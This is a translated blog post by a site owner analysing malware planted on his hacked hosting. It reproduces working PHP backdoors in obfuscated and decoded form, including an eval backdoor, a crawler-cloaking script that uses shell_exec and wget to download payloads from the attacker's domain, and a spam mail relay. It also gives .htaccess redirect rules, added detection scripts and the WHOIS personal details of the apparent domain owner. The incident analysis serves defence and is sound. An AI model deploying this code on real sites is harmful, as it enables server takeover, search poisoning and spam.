
Hello everyone, I am a webmaster and I was hacked



Good day Habr,

The title, of course, lies: I'm not a webmaster. More precisely, I can no longer call myself one after what happened. I will describe how my hosting was hacked, how I missed the event entirely and noticed it only by chance, and the small investigation that followed. I hope my experience will be useful. Anyone interested, welcome under the cut.

As it turned out


I found out about the hack completely by chance, because all the sites on the hosting worked, opened and displayed perfectly decent pages without any extra content. I should note that until then I had never used Google Search Console, only Google Analytics. But having created yet another page, I decided to try the tool. So Search Console was connected to the site and it was time to see what it could do.
One of the console's functions is Fetch as Google, which sends the Googlebot to the pages of the site, and I immediately pointed it at the main site. And then I understood nothing: the page opened from the browser, but the bot reported that the page was not found. Something is wrong here, I thought, but I kept launching the bot, naively believing that Google's bot was broken.


Working out what happened


Since Search Console does not provide detailed information about the error (which, in my opinion, is very sad), I used the http://web-sniffer.net service to emulate the Googlebot and at the same time check whether the site was visible from another point on the planet. I entered the site *******.**, which should serve a single index.php file, solved a captcha and received this 404 page:

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL //bootlegger-limiter.php was not found on this server.</p>
<p>Additionally, a 500 Internal Server Error error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache Server at *******.** Port 80</address>
</body></html>

What bootlegger-limiter.php is that, I thought, and quickly connected to the hosting. The thing is, the site *******.** lives in a subdirectory of the main site (which is in the root). And indeed I found bootlegger-limiter.php in the root. The bot was evidently being redirected by Apache. I opened .htaccess, and the following lines had been added there:

RewriteEngine on
RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ bootlegger-limiter.php?$1 [L]


In other words, search bots and people who came to the site from search engines were shown the page generated by bootlegger-limiter.php.

What a twist. Out of curiosity I decided to see what they were shown. I typed "site:*******.**" into Google:


OK Google, everything is clear. I was slightly surprised that the Googlebot does not compare the content it receives with the bot's HTTP headers against what it gets with, for example, Chrome's headers. But maybe I'm wrong and it is checked, since the notice appeared that the site was probably hacked.

In such a simple way a site can be compromised in search engines, and the unsuspecting owner may never notice. I do not know exactly how the hosting was hacked, because none of the sites on it use a CMS. The only site on a popular framework was on Yii, but apparently that has nothing to do with it: judging by the method, everything seems to have been done automatically, and that framework is hard to break without knowing the site's structure. It seems to me that the password for my account simply leaked. Below I will describe what files were planted on me and what they did.

Dissecting the worm


So, to begin with, the list of planted executable files, when they were dropped, and their contents:

kfcgmxuu.php - April 3, 2016
 <?php $catie ='v]falreE'; $greatly= 'eae';$formulation = '('; $centralization = 'sSLuVSQ_V'; $gummy = 'a';$barrages = ')';$lawyer= ';]s]L'; $craw = '_'; $maisey ='yV]tdiVv'; $juliann='T'; $bridges= 'R'; $betoken= '$';$atheists='R';$eustacia = '^'; $bunting = 'HaSI';$hurleigh ='Rc';$lovingly =')n"th'; $cups = 'et'; $javelin= 'i';$lizard= '('; $chances = '=ej_i'; $leghorn= 'fVRcpr'; $finalized= '('; $expounded=')V'; $bounties='Y'; $bushwhack = 'c';$big= 's6t';$dragging ='('; $appeasable='r'; $frequencies = 'a'; $dolphins ='v_sie"'; $dressers='s$VET'; $heaved='[';$frederique= 'r'; $kettle= 'T'; $fortress ='nU'; $letting ='l';$entrusted='p$i)tE[[e'; $ketti='i'; $coarsest = 'S'; $ashely ='_oZC'; $avrom ='E'; $knower='Te)E:`';$bayonets = 'a)l($ibi';$keying = 'K';$availing =';';$karmen=':T';$ingredient= '[g'; $coincides = '_'; $eyesight= 'v)re'; $iterates ='r[)_c(E'; $dissident='lvek'; $discernibility ='m'; $inclination ='(vrs;_,gS';$characterizes ='e'; $contented= 'r'; $lorrayne= '?'; $archived='g'; $bellowing =';'; $deferrer= '=v(a$,e'; $indiana='fta';$krisiun= '$a$WbqUT'; $gardens= '$i"i_i)'; $evidenced = 'srH';$fruitfulness='"';$f='P'; $bylaw ='ad"v4_ve_';$coriss= '(ElspQ'; $cots= 'esImrvq';$lizard ='a'; $conceived ='y';$arabs=']eOX';$excretion='tu"u';$harmoniously ='r';$figured= ') ';$basful= 'vP(_'; $dapper ='o'; $asks = 'ocnes"';$indira ='t'; $jim ='?'; $coweringly = '$';$incompetent = 'o'; $bitternut = 'gr';$codes = 'd';$grasp='qnOe"$se'; $arachnids = 'VI)i(Q';$elucidate ='dQa'; $husband = $asks['1'] .$bitternut['1'] .$grasp['7'] . $elucidate['2'].$indira.$grasp['7'].$basful['3'] . $indiana[0].$excretion['3'] . $grasp[1] . $asks['1']. $indira. $arachnids['3'].$incompetent. $grasp[1]; $iggy= $figured['1']; $aspirins= $husband($iggy, $grasp['7'] . $basful['0'] .$elucidate['2']. $coriss['2']. $arachnids['4']. $elucidate['2'] .$bitternut['1'] .$bitternut['1'] . $elucidate['2'] .$conceived. $basful['3'] . $coriss['4'] .$incompetent.$coriss['4'] .$arachnids['4']. 
$indiana[0]. $excretion['3'].$grasp[1].$asks['1'].$basful['3'] .$bitternut[0] . $grasp['7'].$indira .$basful['3'] . $elucidate['2'] . $bitternut['1']. $bitternut[0] . $grasp['6'] .$arachnids['4']. $arachnids['2'] .$arachnids['2'] .$arachnids['2']. $bellowing); $aspirins ($indecomposable['1'],$bylaw['4'] , $arachnids['2'],$basful['1'], $karmen['0'] , $big[1],$evidenced['2'], $coriss['4'] ,$arachnids['2'] ,$grasp['5']. $arachnids['3'].$deferrer['0'] . $elucidate['2'] .$bitternut['1'].$bitternut['1'].$elucidate['2']. $conceived .$basful['3']. $cots['3'] .$grasp['7'].$bitternut['1'] . $bitternut[0] . $grasp['7'] . $arachnids['4'] .$grasp['5']. $basful['3'].$leghorn['2'] .$coriss['1'] . $elucidate['1']. $krisiun['6'] . $coriss['1'] .$inclination['8'] .$krisiun['7'] .$deferrer['5'] . $grasp['5'] . $basful['3'] .$ashely['3'].$grasp['2'] . $grasp['2']. $keying.$arachnids[1] . $coriss['1']. $deferrer['5'] . $grasp['5']. $basful['3']. $inclination['8']. $coriss['1'] . $leghorn['2'].$arachnids['0'].$coriss['1']. $leghorn['2'] .$arachnids['2']. $bellowing . $grasp['5'].$elucidate['2'] . $deferrer['0']. $arachnids['3'] . $grasp['6'] . $grasp['6'] . $grasp['7'] .$indira .$arachnids['4'] . $grasp['5'].$arachnids['3']. $iterates[1] .$grasp['4']. $grasp['7'].$coriss['2']. $basful['0']. $arachnids['3'].$basful['0'] . $grasp['6'] . $basful['0']. $grasp['0']. $grasp['4']. $arabs[0] . $arachnids['2'].$jim .$grasp['5']. $arachnids['3'] .$iterates[1]. $grasp['4'] . $grasp['7'] . $coriss['2'].$basful['0'] .$arachnids['3'].$basful['0']. $grasp['6']. $basful['0'] . $grasp['0'] . $grasp['4']. $arabs[0] . $karmen['0'] .$arachnids['4']. $arachnids['3'] . $grasp['6'] .$grasp['6'] .$grasp['7'].$indira. $arachnids['4'] . $grasp['5'] . $arachnids['3'].$iterates[1]. $grasp['4'] . $evidenced['2']. $krisiun['7'] . $krisiun['7'] . $basful['1']. $basful['3'].$coriss['1'] . $lawyer['4'] . $arachnids['0'].$arachnids[1]. $arachnids['0'] .$inclination['8'] . $arachnids['0'] . $elucidate['1']. $grasp['4'] . 
$arabs[0] .$arachnids['2']. $jim. $grasp['5'] . $arachnids['3']. $iterates[1].$grasp['4'] . $evidenced['2'].$krisiun['7'] .$krisiun['7'].$basful['1'] . $basful['3'] . $coriss['1'].$lawyer['4'] . $arachnids['0']. $arachnids[1] .$arachnids['0']. $inclination['8'] .$arachnids['0'] .$elucidate['1'].$grasp['4'] .$arabs[0]. $karmen['0'] .$elucidate['0'] . $arachnids['3']. $grasp['7'] .$arachnids['2'] . $bellowing. $grasp['7'] . $basful['0'] .$elucidate['2'] . $coriss['2']. $arachnids['4']. $grasp['6']. $indira. $bitternut['1'] . $bitternut['1']. $grasp['7'] . $basful['0']. $arachnids['4'] . $krisiun['4'] .$elucidate['2'] . $grasp['6'] . $grasp['7']. $big[1].$bylaw['4'] .$basful['3']. $elucidate['0'] . $grasp['7']. $asks['1']. $incompetent . $elucidate['0'] . $grasp['7']. $arachnids['4'] .$grasp['6']. $indira. $bitternut['1'] . $bitternut['1'] . $grasp['7'].$basful['0'].$arachnids['4']. $grasp['5'].$elucidate['2']. $arachnids['2'] .$arachnids['2'].$arachnids['2'] . $arachnids['2'].$bellowing ); 

.htaccess - April 5, 2016
RewriteEngine on
RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ bootlegger-limiter.php?$1 [L]

bootlegger-limiter.php - April 5, 2016
 <?php $mlksyl="\x63".chr(114)."e".chr(97).chr(116).chr(101)."_"."f".chr(117)."\x6e"."\x63".chr(116)."\x69"."\x6f"."\x6e";$ofanpm = $mlksyl('$a',strrev(';)a$(lave')); $ofanpm(strrev(';))"K0QfJkgCN0XCJkgCNoQD7YWdiRCIvh2YllQCJkgCN0XCJkQCK0QCJkQCJoQDJkQCJkQfJkQCJkgCN0XCJkQCJkgCNsTLtMGJJkQCJkQCJoQD7kiZ1JGJscXZuRCLsFmdkgSZjFGbwVmcp9lc0NXPmVnYkkQCJkQCJkgCNszJ+E2L8ciLy9Gaj5WYk4yJ+IyJuwGJuciI9YWZyhGIhxzJ9cXZuRSCJkQCJkQCK0wOpkSXjRyWztmbpxGJo0WayRHLiwHf8JCKlR2bsBHel1TKy9Gaj5WYkwCbkgCdzlGbJkQCJkQCJoQD7sWYlJnYpADPjRCKgYWaJkQCJkQCJoQD7lCbhZHJgMXYgwWY2pHJog2YhVmcvZWCJkQCJkgCNsTKsFmd6RCKlxmZmVHazlQCJkQCJoQD70FMbNXZoNGdh1GJ9wWY2pHJJkQCJkQCK0wegkSKzVGajRXYtRCIsYWdiRCIsISVpN3LwhXZnVmck8iIowGbh9FajRXYt91ZlJHcoYWaJkQCJkgCNsjI+E2LcxTKq4CK+oSX+41WxwFXp8jKd5DIiwlXbhSK/8jIchSPmVmcopSX+41WzxVY8ICI9ACc4V2ZlJHJJkQCJkgCNsDMy0zYkkCMy4zYkgCImlWCJkQCJoQD7kycr5WasRCKlxmZmVHazlQCJkQCK0wOx0SKztmbpxGJoQnb192YA1zYkkQCJkQCK0wOpMVROlETfdVRO9VRS9kTHl0XFxUSGx3UF5USM9VWUBVTF9FUJt0UfVETJZEL4JXdjRCKlxWamBUPztmbpxGJJkQCJkgCNsXKpgnc1NGJoMHdzlGel9VZslmZAhCImlWCJkQCK0wOiM3clNnLmZmZi4icpR2Yk0DeyV3YkkQCJkgCNoQD7kCbyVncjRCKsJXdj9Vei9VZnFGcfRXZn1jZ1JGJJkQCJoQD701JJJVVfR1UFVVUFJ1JbJVRWJVRT9FJA5SXnQ1UPh0XQRFVIdyWSVkVSV0UfRCQuIyLvoDc0RHai0DbyVncjRSCJkQCK0gCNoQD7V2csVWfJkQCK0wO0lGellQCJkgCNszJ+wWb0h2L84Tek9mYvwzJg8GajVWCJkQCK0wOi4GXiAiLgciPzNXZyRGZh9CPwgDI0J3bQByJg4CIddCVT9ESfBFVUh0JbJVRWJVRT9FJg4CInACdhBiclZnclNFInAiLgkCKu9WazJXZ2BHawBiLgcyLQhEUgcCIuASXnUkUBdFVG90UfJVRWJVRTdyWSVkVSV0UfRCIuAyJ+M3clJHZkFGPnAyboNWZJkQCJoQD7IibcJCIuAyJ+IHa8cCIvh2YllQCJkgCNsjIuxlIg4CIn4DcvwjLyVmdyV2cgMXaoRHIu9GIk5WdvZGI09mbgMXY3ByJg4CIddSSSV1XUNVRVFVRSdyWSVkVSV0UfRCIuAyJgwkUVBCZlR3clVXclJHIlhGV+AHPnAyboNWZJkQCJoQD7IibcJCIuAyJ+EDavwDZuV3bGBCdv5kPxgGPnAyboNWZJkQCJoQD7IibcJCIuAyJ+kHZvJGP+"(edoced_46esab(lave'));?> 

enthusiasms-raw.php - October 9, 2016
<?php
function base64_url_decode($val) {
    return base64_decode(strtr($val, '-_,', '+/='));
}
if(isset($_POST) and count($_POST) > 0){
    if(isset($_POST["chk"])){
        $val = array();
        $val["res"] = 1;
        print json_encode($val);
    }else{
        $post_data = array_values(array_map('stripslashes', $_POST));
        $m_data = explode("|||", base64_url_decode(strrev($post_data[0])));
        if(count($m_data) > 1){
            $val = array();
            if(mail($m_data[0], $m_data[1], $m_data[2], $m_data[3])){
                $val["mail"] = 1;
            } else{
                $val["mail"] = 0;
            }
            print json_encode($val);
        }
    }
}
if(isset($_GET) and count($_GET) > 0){
    $url = "";
    $redic = array_values($_GET);
    foreach(str_split(base64_url_decode($redic[0])) as $letter){
        if(rand(1,3) == 1){
            $url .= $letter;
        }else{
            $url .= $letter."'+'";
        }
    }
?>
<html><head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<title>Redirecting</title>
<script>
var r = '<?php echo $url;?>';
var _0x485b=["\x72\x65\x70\x6C\x61\x63\x65"];
</script>
</head>
<body onload="location[_0x485b[0]](r);">
Loading...
</body></html>
<?php } ?>

equaling-intangibles.php - October 9, 2016
<?php
function base64_url_decode($val) {
    return base64_decode(strtr($val, '-_,', '+/='));
}
if(isset($_POST) and count($_POST) > 0){
    if(isset($_POST["chk"])){
        $val = array();
        $val["res"] = 1;
        print json_encode($val);
    }else{
        $post_data = array_values(array_map('stripslashes', $_POST));
        $m_data = explode("|||", base64_url_decode(strrev($post_data[0])));
        if(count($m_data) > 1){
            $val = array();
            if(mail($m_data[0], $m_data[1], $m_data[2], $m_data[3])){
                $val["mail"] = 1;
            } else{
                $val["mail"] = 0;
            }
            print json_encode($val);
        }
    }
}
if(isset($_GET) and count($_GET) > 0){
    $url = "";
    $redic = array_values($_GET);
    foreach(str_split(base64_url_decode($redic[0])) as $letter){
        if(rand(1,3) == 1){
            $url .= $letter;
        }else{
            $url .= $letter."'+'";
        }
    }
?>
<html><head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<title>Redirecting</title>
<script>
var r = '<?php echo $url;?>';
var _0x485b=["\x72\x65\x70\x6C\x61\x63\x65"];
</script>
</head>
<body onload="location[_0x485b[0]](r);">
Loading...
</body></html>
<?php } ?>

Let's start with the earliest files that landed on the server in April (kfcgmxuu.php and bootlegger-limiter.php). They are obviously obfuscated, so I brought them into readable form and looked at what they do.

kfcgmxuu.php appeared first; this is what it does.

// Merge GET/POST, cookies and server variables; request headers arrive as HTTP_* keys.
$i = array_merge($_REQUEST, $_COOKIE, $_SERVER);
// Take the payload from a parameter/cookie "elvivsvq" or a header "Elvivsvq"; otherwise stop.
$a = isset($i["elvivsvq"]) ? $i["elvivsvq"] : (isset($i["HTTP_ELVIVSVQ"]) ? $i["HTTP_ELVIVSVQ"] : die);
// Reverse, base64-decode, reverse again, and execute the result.
eval(strrev(base64_decode(strrev($a))));

A MIME base64-encoded string, reversed twice, is sent to the site in a cookie, a header or a request argument named elvivsvq, then decoded and executed. From this point on the attacker has complete control over the part of the hosting file system that the web server can access. This is the backdoor through which everything else got in.

Next, with the help of this backdoor, .htaccess is edited and bootlegger-limiter.php is added. Here it is, deobfuscated:

<?php
set_time_limit(0);

function get_page_by_curl($url, $useragent = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36") {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
    $result = curl_exec($ch);
    curl_close($ch);
    return $result;
}

$doorcontent = "";
$x = @$_POST["pppp_check"];
$md5pass = "e5e4570182820af0a183ce1520afe43b";
$host = @$_SERVER["HTTP_HOST"];
$uri = @$_SERVER["REQUEST_URI"];
$host = str_replace("www.", "", $host);
$md5host = md5($host);
$urx = $host . $uri;
$md5urx = md5($urx);
if (function_exists('sys_get_temp_dir')) {
    $tmppath = sys_get_temp_dir();
    if (!is_dir($tmppath)) {
        $tmppath = (dirname(__FILE__));
    }
} else {
    $tmppath = (dirname(__FILE__));
}
$cdir = $tmppath . "/." . $md5host . "/";
$domain = "f.gghijacktest.com";
if ($x != "") {
    $p = md5(base64_decode(@$_POST["p"]));
    if ($p != $md5pass)
        return;
    $pa = @$_POST["pa"];
    if (($x == "2") || ($x == "4")) {
        echo "###UPDATING_FILES###\n";
        if ($x == "2") {
            $cmd = "cd $tmppath; rm -rf .$md5host";
            echo shell_exec($cmd);
        }
        $cmd = "cd $tmppath; wget http://update.$domain/arc/$md5host.tgz -O 1.tgz; tar -xzf 1.tgz; rm -rf 1.tgz";
        if ($pa != "") {
            $pa+=0;
            $cmd = "cd $tmppath; wget http://update.$domain/arc/" . $md5host . "_" . $pa . ".tgz -O 1.tgz; tar -xzf 1.tgz; rm -rf 1.tgz";
        }
        echo shell_exec($cmd);
        exit;
    }
    if ($x == "3") {
        echo "###WORKED###\n";
        exit;
    }
} else {
    $curx = $cdir . $md5urx;
    if (@file_exists($curx)) {
        @list($IDpack, $mk, $doorcontent, $pdf, $contenttype) = @explode("|||", @file_get_contents($curx));
        $doorcontent = @base64_decode($doorcontent);
        $bot = 0;
        $se = 0;
        $mobile = 0;
        if (preg_match("#google|gsa-crawler|AdsBot-Google|Mediapartners|Googlebot-Mobile|spider|bot|yahoo|google web preview|mail\.ru|crawler|baiduspider#i", @$_SERVER["HTTP_USER_AGENT"]))
            $bot = 1;
        if (preg_match("#android|symbian|iphone|ipad|series60|mobile|phone|wap|midp|mobi|mini#i", @$_SERVER["HTTP_USER_AGENT"]))
            $mobile = 1;
        if (preg_match("#google|bing\.com|msn\.com|ask\.com|aol\.com|altavista|search|yahoo|conduit\.com|charter\.net|wow\.com|mywebsearch\.com|handycafe\.com|babylon\.com#i", @$_SERVER["HTTP_REFERER"]))
            $se = 1;
        if ($bot) {
            $pdf+=0;
            if ($pdf == 1) {
                header("Content-Type: application/pdf");
            }
            if ($pdf == 2) {
                header("Content-Type: image/png");
            }
            if ($pdf == 3) {
                header("Content-Type: text/xml");
            }
            if ($pdf == 4) {
                $contenttype = @base64_decode($contenttype);
                $types = explode("\n", $contenttype);
                foreach ($types as $val) {
                    $val = trim($val);
                    if ($val != "")
                        header($val);
                }
            }
            echo $doorcontent;
            exit;
        }
        if ($se) {
            echo get_page_by_curl("http://$domain/lp.php?ip=" . $IDpack . "&mk=" . rawurlencode($mk) . "&d=" . $md5host . "&u=" . $md5urx . "&addr=" . $_SERVER["REMOTE_ADDR"], @$_SERVER["HTTP_USER_AGENT"]);
            exit;
        }
        header($_SERVER['SERVER_PROTOCOL'] . " 404 Not Found");
        echo '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">' . "\n";
        echo '<html><head>' . "\n";
        echo '<title>404 Not Found</title>' . "\n";
        echo '</head><body>' . "\n";
        echo '<h1>Not Found</h1>' . "\n";
        echo '<p>The requested URL ' . $_SERVER['REQUEST_URI'] . ' was not found on this server.</p>' . "\n";
        echo '<hr>' . "\n";
        echo '<address>' . $_SERVER['SERVER_SOFTWARE'] . ' PHP/' . phpversion() . ' Server at ' . $_SERVER['HTTP_HOST'] . ' Port 80</address>' . "\n";
        echo '</body></html>';
        exit;
    } else {
        $crurl = "http://" . @$_SERVER['HTTP_HOST'] . @$_SERVER['REQUEST_URI'];
        $buf = get_page_by_curl($crurl);
        $curx = $cdir . "fff.sess";
        if (@file_exists($curx)) {
            $links = @file($curx, FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES);
            $c = @count($links) - 1;
            shuffle($links);
            if ($c > 20)
                $c = 20;
            $regexp = "<a\s[^>]*href=(\"??)([^\" >]*?)\\1[^>]*>(.*)<\/a>";
            if (preg_match_all("/$regexp/siU", $buf, $matches)) {
                $zval = $matches[0];
                shuffle($zval);
                foreach ($zval as $val) {
                    if ($c < 0)
                        break;
                    list($l, $anchor) = explode("|||", trim($links[$c]));
                    $new = '<a href="' . $l . '">' . $anchor . '</a>';
                    $buf = str_ireplace($val, $new, $buf);
                    $c--;
                }
            }
        }
        echo $buf;
    }
}

In short, this is what happens here. First of all there is a password check (oddly enough, the backdoor above had no password at all, but this one does). The first block serves to check whether the backdoor works and to unpack files. At the time of writing, the files that were being downloaded from the attacker's server had already been deleted.

By the way, about the attacker's server. The domain is registered as f.gghijacktest.com. Through Whois I managed to find out that it belongs to a person with the following details:

Name : Gabriel Northrup
Address : str. Ivana Cupala 1, Ljubljana NE 4111 SI
Telephone : +714022420218
Email : vlasigor3@gmail.com

Maybe someone knows this person ;)

Back to the code. The files from the attacker's server are stored in a temporary directory on the server; in my case it was the folder ~/tmp, and in it I found a folder named .<md5 of my domain>, containing modified pages of my site that are served only to bots. That is, in the search engine they appear as my site, but with obscene text. If a user reached the site's pages from a search engine, they were shown the pill shop from f.gghijacktest.com/lp.php, while the browser's address bar, of course, showed my domain.

Everyone else, who came to the site not from a search engine or typed the address directly, got the usual page, in which the script tries to replace the links with its own; this did not happen in my case because there was no corresponding fff.sess file.

And now let's look at .htaccess :

RewriteEngine on
RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ bootlegger-limiter.php?$1 [L]

This is where the most important thing happens: the redirection of bots and visitors from search engines to the script analysed above. The 2nd and 3rd lines tell Apache to stop after the rules have already been applied once. The following lines define the rules for bots and search-engine referers and redirect them to bootlegger-limiter.php.
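To run the Fetch-as-Google comparison from the start of the post against your own site, here is an added example (written for this post, not code from the original article): it requests the same URL as a plain browser, with a crawler User-Agent and with a search-engine Referer, the three things the rules above key on, and reports any profile whose status or body differs. The header values and the pluggable `fetch` hook are assumptions of the example.

```python
import hashlib
import urllib.error
import urllib.request

# Request profiles. The rewrite rules key on the User-Agent and the Referer,
# so one plain browser request is compared with a crawler UA and with a
# search-engine referer. The header values are constructed for this example.
BROWSER_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0 Safari/537.36"
PROFILES = {
    "browser": {"User-Agent": BROWSER_UA},
    "googlebot_ua": {
        "User-Agent": "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
    },
    "google_referer": {
        "User-Agent": BROWSER_UA,
        "Referer": "https://www.google.com/search?q=example",
    },
}


def http_fetch(url, headers):
    """Fetch url with the given headers and return (status, body bytes).

    HTTP errors are returned rather than raised: the 404 itself is the symptom.
    """
    req = urllib.request.Request(url, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=30) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.read()


def probe(url, fetch=http_fetch):
    """Return {profile: (status, sha256 of body)} for every profile."""
    results = {}
    for name, headers in PROFILES.items():
        status, body = fetch(url, headers)
        results[name] = (status, hashlib.sha256(body).hexdigest())
    return results


def cloaked_profiles(results):
    """Profiles whose status or body differs from the plain browser view."""
    baseline = results["browser"]
    return sorted(name for name, seen in results.items() if seen != baseline)


def check_site(url, fetch=http_fetch):
    """Probe url under all profiles and list the ones that look cloaked."""
    results = probe(url, fetch)
    return {"results": results, "cloaked": cloaked_profiles(results)}


if __name__ == "__main__":
    import sys

    report = check_site(sys.argv[1])
    for name, (status, digest) in report["results"].items():
        print(f"{name:15} HTTP {status}  sha256:{digest[:16]}")
    print("cloaking suspected for:", ", ".join(report["cloaked"]) or "none")
```

Pages that embed per-request tokens or timestamps will differ by hash on every fetch, so on such sites compare the status codes first and diff the bodies by hand.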

As for the other two scripts, enthusiasms-raw.php and equaling-intangibles.php, they are identical and, judging by the mail function, are designed to send spam.
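A file scanner for the constructions seen in the four planted files and the .htaccess, added here as an example (not the author's or any project's code): it counts hits for each pattern per file and reports files that cross a threshold. The rule names and thresholds are my own choices, and a hit is an indicator for manual review, not proof of compromise.

```python
import re
from pathlib import Path

# (rule name, pattern, minimum hits before the rule fires). The patterns mirror
# constructions in the planted files: eval over reversed/base64 input, a
# create_function wrapper, strings built from chr()/\x escapes or one-character
# array lookups, request data merged from cookies and headers, wget staging,
# a mail() relay fed by decoded POST data, and crawler cloaking in PHP or
# .htaccess. Thresholds keep a single legitimate chr() or mail() from firing.
RULES = [
    ("eval_over_decoded_input",
     re.compile(r"eval\s*\(\s*(?:strrev|base64_decode|gzinflate|str_rot13)\s*\(", re.I), 1),
    ("create_function_wrapper", re.compile(r"create_function\s*\(", re.I), 1),
    ("chr_or_hex_string_building", re.compile(r"chr\(\d+\)\s*\.|\\x[0-9a-f]{2}", re.I), 4),
    ("indexed_char_concatenation", re.compile(r"\$\w+\[['\"]?\d+['\"]?\]\s*\."), 20),
    ("request_cookie_server_merge",
     re.compile(r"array_merge\s*\(\s*\$_REQUEST\s*,\s*\$_COOKIE\s*,\s*\$_SERVER", re.I), 1),
    ("shell_exec_call", re.compile(r"\bshell_exec\s*\(", re.I), 1),
    ("wget_in_command_string", re.compile(r"\bwget\s+https?://", re.I), 1),
    ("mail_relay_fed_by_decoded_post",
     re.compile(r"base64_url_decode\s*\(\s*strrev\s*\(|mail\s*\(\s*\$m_data", re.I), 1),
    ("crawler_cloaking_on_user_agent",
     re.compile(r"preg_match\s*\([^)]*googlebot[^)]*HTTP_USER_AGENT", re.I | re.S), 1),
    ("htaccess_crawler_rewrite",
     re.compile(r"RewriteCond\s+%\{HTTP_(?:USER_AGENT|REFERER)\}\s+[^\n]*google", re.I), 1),
]


def scan_source(text):
    """Return {rule: hit count} for every rule whose threshold is met."""
    findings = {}
    for name, pattern, min_hits in RULES:
        hits = len(pattern.findall(text))
        if hits >= min_hits:
            findings[name] = hits
    return findings


def scan_tree(root):
    """Scan *.php and .htaccess files under root; return {relative path: findings}."""
    root = Path(root)
    report = {}
    for path in root.rglob("*"):
        if not path.is_file() or not (path.suffix == ".php" or path.name == ".htaccess"):
            continue
        findings = scan_source(path.read_text(encoding="utf-8", errors="replace"))
        if findings:
            report[str(path.relative_to(root))] = findings
    return report


if __name__ == "__main__":
    import sys

    for rel, findings in sorted(scan_tree(sys.argv[1]).items()):
        print(rel)
        for rule, hits in findings.items():
            print(f"    {rule}: {hits}")
```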

Conclusion


In such a simple way an attacker can use your server, and you, probably, like me, will not even notice. It is worth noting that I do not store anything important on this server and therefore look into it very rarely. But even if I had looked more often, without suspecting anything I might not have noticed a couple of extra files.

In the comments you can share your ways of dealing with such attacks; I think many will find it interesting.

I hope my experience will be useful and that you will once again check your servers for such simple backdoors. Thanks for your attention.

Source: https://habr.com/ru/post/313332/

